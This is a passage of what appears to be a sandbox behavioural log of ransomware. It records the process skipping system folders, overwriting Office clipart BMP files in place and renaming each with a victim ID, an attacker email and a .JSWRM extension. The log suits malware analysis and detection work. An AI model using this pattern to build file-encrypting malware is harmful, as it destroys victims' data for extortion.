lstrcmpiW (lpString1="J0101861.BMP", lpString2="windows") returned -1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2="recovery") returned -1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2="perflogs") returned -1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2="documents and settings") returned 1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2="system volume information") returned -1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2="msocache") returned -1 [0080.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101861.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101861.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101861.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0080.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101861.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101861.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101861.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0080.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0080.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0080.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0080.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101861.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.324] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0080.324] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0080.325] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0080.333] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.333] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0080.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.334] CloseHandle (hObject=0x314) returned 1 [0080.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0080.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0080.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0080.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0080.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0080.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0080.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.334] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101861.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101861.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101861.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0080.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0080.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0080.335] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe5dee50, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101862.BMP", cAlternateFileName="")) returned 1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2=".") returned 1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="..") returned 1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="...") returned 1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="windows") returned -1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="recovery") returned -1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="perflogs") returned -1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="documents and settings") returned 1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="system volume information") returned -1 [0080.335] lstrcmpiW (lpString1="J0101862.BMP", lpString2="msocache") returned -1 [0080.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0080.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101862.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101862.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101862.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0080.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0080.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101862.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101862.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101862.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0080.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0080.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.336] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0080.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101862.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.336] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0080.336] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0080.337] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0080.347] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.347] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0080.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.348] CloseHandle (hObject=0x314) returned 1 [0080.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0080.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0080.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0080.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0080.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0080.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.349] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101862.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101862.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101862.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0080.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0080.397] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe5dee50, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101863.BMP", cAlternateFileName="")) returned 1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2=".") returned 1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="..") returned 1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="...") returned 1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="windows") returned -1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="recovery") returned -1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="perflogs") returned -1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="documents and settings") returned 1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="system volume information") returned -1 [0080.397] lstrcmpiW (lpString1="J0101863.BMP", lpString2="msocache") returned -1 [0080.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0080.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101863.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101863.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101863.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101863.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101863.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101863.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0080.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0080.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101863.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.398] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0080.398] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0080.399] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0080.402] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.402] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0080.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.403] CloseHandle (hObject=0x314) returned 1 [0080.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0080.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0080.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0080.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0080.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0080.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0080.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.404] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101863.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101863.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101863.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0080.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0080.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0080.408] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe5dee50, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101864.BMP", cAlternateFileName="")) returned 1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2=".") returned 1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="..") returned 1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="...") returned 1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="windows") returned -1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="recovery") returned -1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="perflogs") returned -1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="documents and settings") returned 1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="system volume information") returned -1 [0080.408] lstrcmpiW (lpString1="J0101864.BMP", lpString2="msocache") returned -1 [0080.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0080.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101864.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101864.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101864.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0080.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0080.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101864.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101864.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101864.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0080.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0080.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 